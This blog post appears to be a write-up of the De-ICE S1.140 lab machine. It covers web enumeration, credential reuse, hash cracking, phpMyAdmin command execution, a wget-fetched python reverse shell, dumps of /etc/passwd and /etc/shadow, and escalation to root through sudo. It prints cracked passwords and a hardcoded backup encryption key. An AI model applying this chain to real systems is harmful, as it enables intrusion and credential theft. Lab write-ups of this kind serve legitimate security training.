De-IceS1.140

NMAP SCAN

DIRB

---- Scanning URL: http://172.16.28.131:80/ ----
+ http://172.16.28.131:80/cgi-bin/
(CODE:403|SIZE:210)
==> DIRECTORY: http://172.16.28.131:80/forum/
+ http://172.16.28.131:80/index
(CODE:200|SIZE:1782)
+ http://172.16.28.131:80/index.html(CODE:200|SIZE:1782)
+ http://172.16.28.131:80/server-status
(CODE:403|SIZE:215)

---- Scanning URL: https://172.16.28.131/ ----
+ https://172.16.28.131/cgi-bin/
(CODE:403|SIZE:210)
==> DIRECTORY: https://172.16.28.131/forum/
+ https://172.16.28.131/index
(CODE:200|SIZE:1782)
+ https://172.16.28.131/index.html(CODE:200|SIZE:1782)
==> DIRECTORY: https://172.16.28.131/phpmyadmin/
+ https://172.16.28.131/server-status
(CODE:403|SIZE:215)
==> DIRECTORY: https://172.16.28.131/webmail/

The Web App

 

Found Sandy
(SWillard) email… She may be an admin for this app from the looks for this
thread… Also can deduce from this thread that email addresses are
initials@lazyadmins.corp.

 

Sandy =
sw@lazyadmins.corp

 

Sandy got married
and changed her name from Sandy Rainesto Sandy Willard.

Found that this app is My Little Forum Version 2.3.1

 

Found a section in
the forums the posted a copy of the auth.log file.  Parsed through it and found a small section
with a connection from a 10.0.0.23 that contained a password for mbrown…

Mbrown

!DFiuoTkbxtdk0!


Logged in to mail
server as mbrown. (Reused credentials) Lets see if there is anything good!

Looks like
phpmyadmin creds…

And in his sent
items we get confirmation that they are PHPMyAdmin Creds…

Root

S4!y.dk)j/_d1pKtX1

 

We have hashes for
the squirrelmail logins…

We have hashes for
the forum logins…

Could not easily
identify the hashing algorithm for the forum app…  So I replaced the admins hash with the one
from Mbrown and logged in..

Admin access!

Started cracking
hashes for SquirrelMail:

 

rh@lazyadmin.corp

20f1275ce5e67be2c06476333b68f585 MD5 : tum-ti-tum

sw@lazyadmin.corp

07255e7701a86ad1672765d15082f1a3 MD5 : Austin-Willard

mb@lazyadmin.corp

d768176c4486ce77787c73883406fe97 MD5 : !DFiuoTkbxtdk0!

mp@lazyadmin.corp

fa514a9f39391658b15d5db542029aa6 [Not found]

Used PHPMyAdmin to create PHP command execution.  Found that templates_c directory was writable from the forum update page in the admin section.

Used shell to wget a python reverse shell from my web server.

Ran python shell from the same command, and got a shell back.

Uploaded a Meterpreter shell to get a more stable shell.

dumped /etc/passwd

 

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
mysql:x:105:113:MySQL Server,,,:/nonexistent:/bin/false
dovecot:x:106:115:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:107:65534:Dovecot login user,,,:/nonexistent:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
postfix:x:109:116::/var/spool/postfix:/bin/false
memcache:x:110:118:Memcached,,,:/nonexistent:/bin/false
proftpd:x:111:65534::/var/run/proftpd:/bin/false
ftp:x:112:65534::/home/ftp:/bin/false
vmail:x:150:8:Virtual maildir handler:/var/vmail:/sbin/nologin
mbrown:x:1001:1001:Mark Brown,404,2457,:/home/mbrown:/bin/bash
rhedley:x:1002:1002:Richard Hedley,407,3412,:/home/rhedley:/bin/bash
swillard:x:1003:1003:Sandy Willard,401,1429,:/home/swillard:/bin/bash
mparker:x:1004:1004:Miles Parker,403,6283,:/home/mparker:/bin/bash

Found mbrown, rhedley,swillard, and mparker

Can not SSH due to public key checking so I decided to try to su as each user with their forum passwords.

rhedley worked!

Found backup.sh in /opt/

Found script that creates /home/ftp/backup***.tar.gz.enc WITH PASSWORD!

rhedley@webhost:/opt$ cat backup.sh

cat backup.sh

#!/bin/bash

## Backup Script

## by SRaines

## Lazy Admin Corp

TMPBACKUP=”/tmp/backup”;

NAME_PREFIX=”backup”;

NAME_DATE=$(date +%y%m%d);

NAME_HOST=$(/bin/hostname);

FILENAME=${NAME_PREFIX}_${NAME_HOST}_${NAME_DATE}.tar;

[ ! -d ${TMPBACKUP} ] && mkdir -p ${TMPBACKUP}

tar cpf ${TMPBACKUP}/${FILENAME} /etc/fstab /etc/apache2 /etc/hosts /etc/motd /etc/ssh/sshd_config /etc/dovecot /etc/postfix /var/www /home /opt

gzip –best -f ${TMPBACKUP}/${FILENAME}

openssl aes-256-cbc -in ${TMPBACKUP}/${FILENAME}.gz -out ${TMPBACKUP}/${FILENAME}.gz.enc -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs

mv ${TMPBACKUP}/${FILENAME}.gz.enc ./

rm -fr ${TMPBACKUP}

So the encryption password is wpaR9V616xrDTy98L7Uje2DDU5hWtWhs

 

 

rhedley@webhost:/home/ftp/incoming$ chmod 777 test.tar.gz

rhedley@webhost:/home/ftp/incoming$ tar -xf test.tar.gz

tar -xf test.tar.gz

rhedley@webhost:/home/ftp/incoming$ ls

ls

15023.c  backup_webhost_130111.tar.gz.enc  etc  test.tar.gz

———-

rhedley@webhost:/home/ftp/incoming/etc$ chmod 777 shadow

chmod 777 shadow

rhedley@webhost:/home/ftp/incoming/etc$ cat shadow

cat shadow

root:!:15773:0:99999:7:::

daemon:*:15773:0:99999:7:::

bin:*:15773:0:99999:7:::

sys:*:15773:0:99999:7:::

sync:*:15773:0:99999:7:::

games:*:15773:0:99999:7:::

man:*:15773:0:99999:7:::

lp:*:15773:0:99999:7:::

mail:*:15773:0:99999:7:::

news:*:15773:0:99999:7:::

uucp:*:15773:0:99999:7:::

proxy:*:15773:0:99999:7:::

www-data:*:15773:0:99999:7:::

backup:*:15773:0:99999:7:::

list:*:15773:0:99999:7:::

irc:*:15773:0:99999:7:::

gnats:*:15773:0:99999:7:::

nobody:*:15773:0:99999:7:::

libuuid:!:15773:0:99999:7:::

syslog:*:15773:0:99999:7:::

messagebus:*:15773:0:99999:7:::

whoopsie:*:15773:0:99999:7:::

landscape:*:15773:0:99999:7:::

mysql:!:15773:0:99999:7:::

sshd:*:15773:0:99999:7:::

sraines:$6$4S0pqZzV$t91VbUY8ActvkS3717wllrv8ExZO/ZSHDIakHmPCvwzedKt2qDRh7509Zhk45QkKEMYPPwP7PInpp6WAJYwvk1:15773:0:99999:7:::

mbrown:$6$DhcTFbl/$GcvUMLKvsybo4uXaS6Wx08rCdk6dPfYXASXzahAHlgy8A90PfwdoJXXyXZluw95aQeTGrjWF2zYPR0z2bX4p31:15773:0:99999:7:::

rhedley:$6$PpzRSzPO$0MhuP.G1pCB3Wc1zAzFSTSnOnEeuJm5kbXUGmlAwH2Jz1bFJU/.ZPwsheyyt4hrtMvZ/k6wT38hXYZcWY2ELV/:15773:0:99999:7:::

 

Sent hashes into cracking rig.

 

 

Mbrown

Mbrown

sraines

brillantissimo

 

rhedley@webhost:/home/ftp/incoming/etc$ su swillard

su swillard

Password: brillantissimo

swillard@webhost:/home/ftp/incoming/etc$ sudo ls /root

sudo ls /root

[sudo] password for swillard: brillantissimo

cleanlogs.sh  secret.jpg

sudo cp /root/secret.jpg /var/www

swillard@webhost:/home/ftp/incoming/etc$

 

2 thoughts on “De-IceS1.140

Leave a Reply

Your email address will not be published. Required fields are marked *

The opinions and thoughts on this blog are those of Overflow Security members, and do not reflect those of our members employers.